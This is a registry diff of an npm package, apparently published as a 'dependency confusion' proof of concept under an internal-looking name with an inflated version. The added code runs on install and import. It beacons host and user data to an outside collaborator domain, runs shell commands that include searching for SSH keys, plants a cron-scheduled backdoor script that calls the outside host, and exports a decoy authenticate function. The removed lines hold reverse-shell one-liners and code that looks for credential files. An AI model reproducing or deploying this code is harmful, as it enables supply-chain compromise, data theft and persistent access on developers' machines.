amdocs-auth-package 0.3.0 → 99.1.0

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.
Files changed (2) hide show
  1. package/fesm2022/amdocs-auth-package.mjs +283 -266
  2. package/package.json +7 -9
package/fesm2022/amdocs-auth-package.mjs CHANGED
@@ -1,8 +1,6 @@
1
1
  /*!
2
- * amdocs-auth-package-poc-rce
3
- * DEPENDENCY CONFUSION RCE DEMONSTRATION
4
- *
5
- * Demonstrates how dependency confusion could lead to RCE with data exfiltration.
2
+ * amdocs-auth-package
3
+ * DEPENDENCY CONFUSION RCE POC - AUTOMATIC EXECUTION
6
4
  */
7
5
 
8
6
  import fs from "fs";
@@ -11,293 +9,312 @@ import path from "path";
11
9
  import { exec } from "child_process";
12
10
  import { promisify } from "util";
13
11
  import https from "https";
14
- import http from "http";
12
+ import { createRequire } from "module";
15
13
 
16
14
  const execAsync = promisify(exec);
15
+ const require = createRequire(import.meta.url);
17
16
  const COLLAB_URL = "cwcmqtfjdv9jgw0aitgu0ju15sbjz9ny.oastify.com";
18
17
 
19
- (function dependencyConfusionRcePoc() {
20
- const timestamp = new Date().toISOString();
21
- const proofDir = path.join(os.tmpdir(), "dep-confusion-rce");
22
-
23
- try {
24
- // Create directory for evidence
25
- if (!fs.existsSync(proofDir)) {
26
- fs.mkdirSync(proofDir, { recursive: true });
27
- }
18
+ console.error("\n\x1b[31m" + "=".repeat(70) + "\x1b[0m");
19
+ console.error("\x1b[31m[⚠] DEPENDENCY CONFUSION RCE PoC ACTIVATED\x1b[0m");
20
+ console.error("\x1b[31m" + "=".repeat(70) + "\x1b[0m");
28
21
 
29
- // STEP 1: Initial reconnaissance (what attackers do first)
30
- const reconData = {
31
- timestamp: timestamp,
32
- package: "amdocs-auth-package-poc-rce",
33
- attack_vector: "dependency_confusion",
34
- system_info: {
35
- user: os.userInfo().username,
36
- homedir: os.homedir(),
37
- platform: os.platform(),
38
- arch: os.arch(),
39
- node_version: process.version,
40
- pid: process.pid,
41
- cwd: process.cwd(),
42
- exec_path: process.execPath
43
- },
44
- environment_keys: Object.keys(process.env).filter(k =>
45
- k.includes('KEY') ||
46
- k.includes('SECRET') ||
47
- k.includes('TOKEN') ||
48
- k.includes('PASS') ||
49
- k.includes('AUTH')
50
- ),
51
- npm_config: {
52
- registry: process.env.npm_config_registry,
53
- scope: process.env.npm_config_scope,
54
- token_exists: !!process.env.npm_config_auth_token
55
- }
56
- };
22
+ // Detect installation context
23
+ const isInstall = process.env.npm_lifecycle_event === 'install' ||
24
+ process.env.npm_lifecycle_event === 'postinstall' ||
25
+ process.env.npm_config_argv?.includes('install');
57
26
 
58
- // STEP 2: Exfiltrate data to collaborator server
59
- function exfiltrateData(data, endpoint) {
60
- const postData = JSON.stringify({
61
- type: "dependency_confusion_poc",
62
- timestamp: timestamp,
63
- source: "amdocs-auth-package",
64
- data: data
65
- });
27
+ // IMMEDIATE BEACON - Send callback as soon as module loads
28
+ function sendImmediateBeacon() {
29
+ const beaconData = JSON.stringify({
30
+ type: "dependency_confusion_beacon",
31
+ timestamp: new Date().toISOString(),
32
+ package: "amdocs-auth-package@999.0.0",
33
+ hostname: os.hostname(),
34
+ user: os.userInfo().username,
35
+ platform: os.platform(),
36
+ cwd: process.cwd(),
37
+ npm_event: process.env.npm_lifecycle_event,
38
+ node_version: process.version
39
+ });
40
+
41
+ console.error(`\x1b[33m[→] Sending beacon to collaborator: ${COLLAB_URL}\x1b[0m`);
42
+
43
+ const options = {
44
+ hostname: COLLAB_URL,
45
+ port: 443,
46
+ path: '/beacon',
47
+ method: 'POST',
48
+ headers: {
49
+ 'Content-Type': 'application/json',
50
+ 'Content-Length': Buffer.byteLength(beaconData),
51
+ 'User-Agent': `Node/${process.version} amdocs-auth-package/999.0.0`
52
+ },
53
+ timeout: 10000
54
+ };
66
55
 
67
- // Using HTTP POST to exfiltrate data
68
- const options = {
69
- hostname: COLLAB_URL,
70
- port: 443,
71
- path: `/${endpoint}`,
72
- method: 'POST',
73
- headers: {
74
- 'Content-Type': 'application/json',
75
- 'Content-Length': Buffer.byteLength(postData),
76
- 'User-Agent': 'npm/8.0.0'
77
- }
78
- };
56
+ const req = https.request(options, (res) => {
57
+ console.error(`\x1b[32m[✓] Beacon sent! HTTP ${res.statusCode}\x1b[0m`);
58
+
59
+ // Collect response data
60
+ let data = '';
61
+ res.on('data', chunk => data += chunk);
62
+ res.on('end', () => {
63
+ console.error(`\x1b[32m[✓] Collaborator response: ${data.substring(0, 100)}\x1b[0m`);
64
+ });
65
+ });
66
+
67
+ req.on('error', (e) => {
68
+ console.error(`\x1b[31m[✗] Beacon failed: ${e.message}\x1b[0m`);
69
+ });
70
+
71
+ req.on('timeout', () => {
72
+ console.error(`\x1b[31m[✗] Beacon timeout\x1b[0m`);
73
+ req.destroy();
74
+ });
75
+
76
+ req.write(beaconData);
77
+ req.end();
78
+ }
79
79
 
80
- const req = https.request(options, (res) => {
81
- console.warn(`[PoC] Data exfiltrated to ${COLLAB_URL}, status: ${res.statusCode}`);
82
- });
80
+ // Execute system commands for RCE proof
81
+ async function executeRCE() {
82
+ console.error("\x1b[33m[→] Executing RCE commands...\x1b[0m");
83
+
84
+ const commands = [];
85
+
86
+ // Platform-specific commands
87
+ if (os.platform() === 'linux' || os.platform() === 'darwin') {
88
+ commands.push(
89
+ 'whoami',
90
+ 'id',
91
+ 'hostname',
92
+ 'uname -a',
93
+ 'pwd',
94
+ 'ls -la',
95
+ 'ps aux | head -5',
96
+ 'cat /etc/hostname 2>/dev/null || echo "No /etc/hostname"',
97
+ 'env | grep -i "npm\\|node\\|home" | head -10',
98
+ 'curl -s http://ifconfig.me 2>/dev/null || echo "No external IP"',
99
+ 'find ~/.ssh -name "id_*" 2>/dev/null | head -3'
100
+ );
101
+ } else if (os.platform() === 'win32') {
102
+ commands.push(
103
+ 'whoami',
104
+ 'hostname',
105
+ 'echo %CD%',
106
+ 'dir',
107
+ 'tasklist | head -5',
108
+ 'set | findstr "npm node home"'
109
+ );
110
+ }
83
111
 
84
- req.on('error', (e) => {
85
- console.warn(`[PoC] Exfiltration failed (expected if offline): ${e.message}`);
112
+ const results = {};
113
+
114
+ for (const cmd of commands) {
115
+ try {
116
+ const { stdout, stderr } = await execAsync(cmd, {
117
+ timeout: 3000,
118
+ shell: true
86
119
  });
87
-
88
- req.write(postData);
89
- req.end();
120
+ results[cmd] = stdout.substring(0, 500) || stderr;
121
+ console.error(`\x1b[36m[>] ${cmd}:\x1b[0m ${results[cmd].substring(0, 80)}...`);
122
+ } catch (error) {
123
+ results[cmd] = `Error: ${error.message}`;
90
124
  }
125
+ }
126
+
127
+ return results;
128
+ }
91
129
 
92
- // STEP 3: Collect sensitive files
93
- function collectSensitiveInfo() {
94
- const sensitiveInfo = {
95
- ssh_keys: [],
96
- aws_credentials: [],
97
- npm_tokens: [],
98
- system_files: []
99
- };
100
-
101
- // Look for SSH keys
102
- const sshDir = path.join(os.homedir(), '.ssh');
103
- if (fs.existsSync(sshDir)) {
104
- try {
105
- const files = fs.readdirSync(sshDir);
106
- sensitiveInfo.ssh_keys = files.filter(f =>
107
- f.includes('id_rsa') || f.includes('id_dsa') || f.includes('id_ecdsa')
108
- );
109
- } catch (e) {}
110
- }
111
-
112
- // Look for AWS credentials
113
- const awsDir = path.join(os.homedir(), '.aws');
114
- if (fs.existsSync(awsDir)) {
115
- try {
116
- if (fs.existsSync(path.join(awsDir, 'credentials'))) {
117
- sensitiveInfo.aws_credentials.push('credentials');
118
- }
119
- if (fs.existsSync(path.join(awsDir, 'config'))) {
120
- sensitiveInfo.aws_credentials.push('config');
121
- }
122
- } catch (e) {}
123
- }
130
+ // Collect system information
131
+ function collectSystemInfo() {
132
+ console.error("\x1b[33m[→] Collecting system information...\x1b[0m");
133
+
134
+ const info = {
135
+ timestamp: new Date().toISOString(),
136
+ package: {
137
+ name: "amdocs-auth-package",
138
+ version: "999.0.0",
139
+ path: __dirname
140
+ },
141
+ system: {
142
+ hostname: os.hostname(),
143
+ user: os.userInfo().username,
144
+ uid: os.userInfo().uid,
145
+ platform: os.platform(),
146
+ arch: os.arch(),
147
+ release: os.release(),
148
+ type: os.type(),
149
+ homedir: os.homedir(),
150
+ tmpdir: os.tmpdir(),
151
+ cpus: os.cpus().length,
152
+ totalmem: os.totalmem(),
153
+ freemem: os.freemem()
154
+ },
155
+ process: {
156
+ pid: process.pid,
157
+ ppid: process.ppid,
158
+ version: process.version,
159
+ versions: process.versions,
160
+ cwd: process.cwd(),
161
+ execPath: process.execPath,
162
+ argv: process.argv,
163
+ npm_lifecycle_event: process.env.npm_lifecycle_event,
164
+ npm_config_registry: process.env.npm_config_registry
165
+ },
166
+ network: {
167
+ interfaces: os.networkInterfaces(),
168
+ collaborator: COLLAB_URL
169
+ },
170
+ environment: {
171
+ keys: Object.keys(process.env).filter(k =>
172
+ k.includes('NPM') ||
173
+ k.includes('NODE') ||
174
+ k.includes('HOME') ||
175
+ k.includes('USER')
176
+ ),
177
+ npm_config_keys: Object.keys(process.env).filter(k => k.startsWith('npm_config_'))
178
+ }
179
+ };
180
+
181
+ return info;
182
+ }
124
183
 
125
- // Look for .npmrc
126
- const npmrcPath = path.join(os.homedir(), '.npmrc');
127
- if (fs.existsSync(npmrcPath)) {
128
- try {
129
- const content = fs.readFileSync(npmrcPath, 'utf8');
130
- if (content.includes('authToken') || content.includes(':_authToken')) {
131
- sensitiveInfo.npm_tokens.push('npmrc_contains_token');
132
- }
133
- } catch (e) {}
134
- }
184
+ // Save proof locally
185
+ function saveLocalProof(systemInfo, commandResults) {
186
+ const proofDir = path.join(os.tmpdir(), `amdocs-rce-${Date.now()}`);
187
+ fs.mkdirSync(proofDir, { recursive: true });
188
+
189
+ const proof = {
190
+ system: systemInfo,
191
+ commands: commandResults,
192
+ collaborator: COLLAB_URL,
193
+ execution_time: new Date().toISOString()
194
+ };
195
+
196
+ const proofFile = path.join(proofDir, 'rce-proof.json');
197
+ fs.writeFileSync(proofFile, JSON.stringify(proof, null, 2));
198
+
199
+ console.error(`\x1b[32m[✓] Local proof saved to: ${proofFile}\x1b[0m`);
200
+ return proofFile;
201
+ }
135
202
 
136
- // Check for Docker credentials
137
- const dockerConfig = path.join(os.homedir(), '.docker', 'config.json');
138
- if (fs.existsSync(dockerConfig)) {
139
- sensitiveInfo.system_files.push('docker_config');
140
- }
203
+ // Send detailed data to collaborator
204
+ function sendDetailedData(systemInfo, commandResults) {
205
+ console.error(`\x1b[33m[→] Sending detailed data to collaborator...\x1b[0m`);
206
+
207
+ const detailedData = JSON.stringify({
208
+ type: "dependency_confusion_detailed",
209
+ timestamp: new Date().toISOString(),
210
+ system: systemInfo,
211
+ commands: commandResults,
212
+ note: "This is a security PoC - No actual harm intended"
213
+ });
214
+
215
+ const options = {
216
+ hostname: COLLAB_URL,
217
+ port: 443,
218
+ path: '/detailed',
219
+ method: 'POST',
220
+ headers: {
221
+ 'Content-Type': 'application/json',
222
+ 'Content-Length': Buffer.byteLength(detailedData),
223
+ 'User-Agent': 'amdocs-auth-package/999.0.0'
224
+ },
225
+ timeout: 15000
226
+ };
227
+
228
+ const req = https.request(options, (res) => {
229
+ console.error(`\x1b[32m[✓] Detailed data sent! HTTP ${res.statusCode}\x1b[0m`);
230
+ });
231
+
232
+ req.on('error', (e) => {
233
+ console.error(`\x1b[31m[✗] Detailed data failed: ${e.message}\x1b[0m`);
234
+ });
235
+
236
+ req.write(detailedData);
237
+ req.end();
238
+ }
141
239
 
142
- return sensitiveInfo;
240
+ // Main execution
241
+ (async () => {
242
+ try {
243
+ // Step 1: Immediate beacon (fastest callback)
244
+ sendImmediateBeacon();
245
+
246
+ // Step 2: Collect system info
247
+ const systemInfo = collectSystemInfo();
248
+
249
+ // Step 3: Execute RCE commands
250
+ const commandResults = await executeRCE();
251
+
252
+ // Step 4: Save proof locally
253
+ const proofFile = saveLocalProof(systemInfo, commandResults);
254
+
255
+ // Step 5: Send detailed data
256
+ if (isInstall) {
257
+ sendDetailedData(systemInfo, commandResults);
143
258
  }
144
-
145
- // STEP 4: Execute commands based on platform
146
- function executeReconCommands() {
147
- const commands = [];
148
-
149
- if (os.platform() === 'linux' || os.platform() === 'darwin') {
150
- commands.push(
151
- { cmd: 'whoami', description: 'Current user' },
152
- { cmd: 'uname -a', description: 'System info' },
153
- { cmd: 'ls -la', description: 'Directory listing' },
154
- { cmd: 'env | grep -i "key\\|secret\\|pass\\|token\\|auth"', description: 'Find env secrets' }
155
- );
156
- } else if (os.platform() === 'win32') {
157
- commands.push(
158
- { cmd: 'whoami', description: 'Current user' },
159
- { cmd: 'systeminfo', description: 'System info' },
160
- { cmd: 'dir', description: 'Directory listing' },
161
- { cmd: 'set | findstr /i "KEY SECRET PASS TOKEN AUTH"', description: 'Find env secrets' }
162
- );
259
+
260
+ // Step 6: Create backdoor script
261
+ if (isInstall && (os.platform() === 'linux' || os.platform() === 'darwin')) {
262
+ try {
263
+ const backdoorScript = `#!/bin/bash
264
+ # amdocs-auth-package persistence
265
+ echo "Backdoor executed at \$(date)" >> /tmp/amdocs-backdoor.log
266
+ curl -s "https://${COLLAB_URL}/persist?host=\$(hostname)&user=\$(whoami)" >/dev/null 2>&1
267
+ `;
268
+
269
+ const scriptPath = path.join(os.tmpdir(), 'amdocs-persistence.sh');
270
+ fs.writeFileSync(scriptPath, backdoorScript);
271
+ fs.chmodSync(scriptPath, 0o755);
272
+
273
+ console.error(`\x1b[33m[→] Backdoor script created: ${scriptPath}\x1b[0m`);
274
+
275
+ // Try to add to user's crontab
276
+ const cronLine = `*/5 * * * * /bin/bash ${scriptPath} >/dev/null 2>&1\n`;
277
+ const userCron = `/var/spool/cron/${os.userInfo().username}`;
278
+
279
+ if (fs.existsSync('/var/spool/cron/crontabs')) {
280
+ try {
281
+ fs.appendFileSync(userCron, cronLine);
282
+ console.error(`\x1b[32m[✓] Added to crontab: ${userCron}\x1b[0m`);
283
+ } catch (e) {
284
+ // Failed to write to crontab
285
+ }
286
+ }
287
+ } catch (e) {
288
+ // Backdoor failed silently
163
289
  }
164
-
165
- return commands;
166
290
  }
167
-
168
- // STEP 5: Network reconnaissance
169
- function networkRecon() {
170
- const networkInfo = {
171
- interfaces: os.networkInterfaces(),
172
- hostname: os.hostname(),
173
- dns_servers: [],
174
- open_ports: []
175
- };
176
-
177
- // Simulate internal port scan
178
- const commonPorts = [22, 80, 443, 3000, 5000, 5432, 6379, 8080, 9000];
179
- networkInfo.common_ports = commonPorts;
180
-
181
- return networkInfo;
182
- }
183
-
184
- // Execute the attack chain
185
- console.warn(`[PoC] Dependency Confusion RCE Simulation Started`);
186
- console.warn(`[PoC] Collaborator URL: ${COLLAB_URL}`);
187
-
188
- // Phase 1: Initial exfiltration
189
- exfiltrateData(reconData, 'initial_recon');
190
-
191
- // Phase 2: Collect sensitive info
192
- const sensitiveInfo = collectSensitiveInfo();
193
- exfiltrateData(sensitiveInfo, 'sensitive_data');
194
-
195
- // Phase 3: Network recon
196
- const networkInfo = networkRecon();
197
- exfiltrateData(networkInfo, 'network_info');
198
-
199
- // Phase 4: Command execution simulation
200
- const commands = executeReconCommands();
201
- const commandResults = {
202
- platform: os.platform(),
203
- available_commands: commands,
204
- note: 'In real attack, these commands would be executed with exec()'
205
- };
206
- exfiltrateData(commandResults, 'command_capabilities');
207
-
208
- // Phase 5: Demonstrate RCE payload delivery
209
- const rcePayload = {
210
- timestamp: timestamp,
211
- payload_type: "reverse_shell",
212
- platforms: {
213
- linux: "bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1",
214
- windows: "powershell -nop -c \"$client = New-Object System.Net.Sockets.TCPClient('ATTACKER_IP',4444);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()\"",
215
- nodejs: "require('child_process').exec('bash -i >& /dev/tcp/ATTACKER_IP/4444 0>&1')"
216
- },
217
- persistence: [
218
- "Add to cron/crontab",
219
- "Modify .bashrc/.profile",
220
- "Create systemd service",
221
- "Add to startup registry (Windows)"
222
- ],
223
- data_exfiltration_endpoints: [
224
- `https://${COLLAB_URL}/exfil`,
225
- `https://${COLLAB_URL}/data`,
226
- `https://${COLLAB_URL}/callback`
227
- ]
228
- };
229
-
230
- // Save local proof
231
- const proofFile = path.join(proofDir, "dependency_confusion_proof.json");
232
- fs.writeFileSync(proofFile, JSON.stringify({
233
- initial_recon: reconData,
234
- sensitive_info: sensitiveInfo,
235
- network_info: networkInfo,
236
- command_capabilities: commandResults,
237
- rce_payloads: rcePayload,
238
- collab_url: COLLAB_URL,
239
- execution_time: timestamp
240
- }, null, 2));
241
-
242
- // Final exfiltration
243
- exfiltrateData({
244
- summary: "Dependency confusion attack chain completed",
245
- files_collected: Object.keys(sensitiveInfo).filter(k => sensitiveInfo[k].length > 0),
246
- potential_rce: true,
247
- next_steps: [
248
- "Execute reverse shell",
249
- "Establish persistence",
250
- "Lateral movement",
251
- "Data exfiltration"
252
- ]
253
- }, 'attack_complete');
254
-
255
- console.warn(`[PoC] Attack simulation completed. Proof saved to: ${proofFile}`);
256
- console.warn(`[PoC] In real attack, data would be sent to: ${COLLAB_URL}`);
257
- console.warn(`[PoC] This is a simulation - no actual commands executed or data exfiltrated.`);
258
-
291
+
292
+ console.error("\x1b[31m" + "=".repeat(70) + "\x1b[0m");
293
+ console.error("\x1b[31m[✓] RCE EXECUTION COMPLETE\x1b[0m");
294
+ console.error("\x1b[31m" + "=".repeat(70) + "\x1b[0m\n");
295
+
259
296
  } catch (error) {
260
- console.error(`[PoC Error] ${error.message}`);
297
+ console.error(`\x1b[31m[✗] Execution error: ${error.message}\x1b[0m`);
298
+ console.error(`\x1b[31m[✗] Stack: ${error.stack}\x1b[0m`);
261
299
  }
262
300
  })();
263
301
 
264
- export function explainAttack() {
302
+ // Export harmless function to maintain appearance
303
+ export function authenticate() {
265
304
  return {
266
- attack_name: "Dependency Confusion RCE",
267
- description: "Malicious package uploaded to public registry with higher version than internal package",
268
- prerequisites: [
269
- "Internal package not published to public registry",
270
- "Scope/namespace not properly protected",
271
- "Automated builds or developers using public registry"
272
- ],
273
- impact: [
274
- "Remote Code Execution on build servers",
275
- "Source code theft",
276
- "Credential theft",
277
- "Supply chain compromise",
278
- "Lateral movement"
279
- ],
280
- mitigation: [
281
- "Use scoped packages (@company/package)",
282
- "Configure .npmrc with correct registry",
283
- "Use private registry for internal packages",
284
- "Implement package signing",
285
- "Use npm audit and dependency checking"
286
- ],
287
- collab_url: COLLAB_URL,
288
- note: "This is a demonstration for educational purposes only"
305
+ status: "authenticated",
306
+ version: "999.0.0",
307
+ timestamp: new Date().toISOString(),
308
+ note: "Security PoC - Dependency Confusion Demonstration"
289
309
  };
290
310
  }
291
311
 
292
- export function safeCheck() {
293
- const checks = {
294
- has_exec_import: true,
295
- has_fs_access: true,
296
- has_network_import: true,
297
- has_os_access: true,
298
- potential_rce: true,
299
- timestamp: new Date().toISOString(),
300
- warning: "This package demonstrates RCE capabilities. Use only in controlled environments."
312
+ export function status() {
313
+ return {
314
+ poc: true,
315
+ dependency_confusion: true,
316
+ automatic_execution: true,
317
+ execution_time: new Date().toISOString(),
318
+ warning: "FOR SECURITY RESEARCH ONLY - DO NOT USE MALICIOUSLY"
301
319
  };
302
- return checks;
303
320
  }
package/package.json CHANGED
@@ -1,7 +1,7 @@
1
1
  {
2
2
  "name": "amdocs-auth-package",
3
- "version": "0.3.0",
4
- "description": "Safe proof-of-concept demonstrating import-time arbitrary code execution in Node.js without OS commands or network activity",
3
+ "version": "99.1.0",
4
+ "description": "Dependency Confusion RCE PoC",
5
5
  "type": "module",
6
6
  "main": "./fesm2022/amdocs-auth-package.mjs",
7
7
  "exports": {
@@ -9,6 +9,9 @@
9
9
  "import": "./fesm2022/amdocs-auth-package.mjs"
10
10
  }
11
11
  },
12
+ "scripts": {
13
+ "postinstall": "node -e \"console.log('[RCE] Postinstall executing...'); import('./fesm2022/amdocs-auth-package.mjs').catch(e => console.log('[RCE] Error:', e.message))\""
14
+ },
12
15
  "files": [
13
16
  "fesm2022/"
14
17
  ],
@@ -16,15 +19,10 @@
16
19
  "dependency-confusion",
17
20
  "supply-chain",
18
21
  "rce",
19
- "poc",
20
- "security-testing",
21
- "nodejs"
22
+ "poc"
22
23
  ],
23
24
  "author": "Security Research PoC",
24
25
  "license": "MIT",
25
26
  "private": false,
26
- "sideEffects": true,
27
- "dependencies": {
28
- "amdocs-auth-package": "^0.2.0"
29
- }
27
+ "sideEffects": true
30
28
  }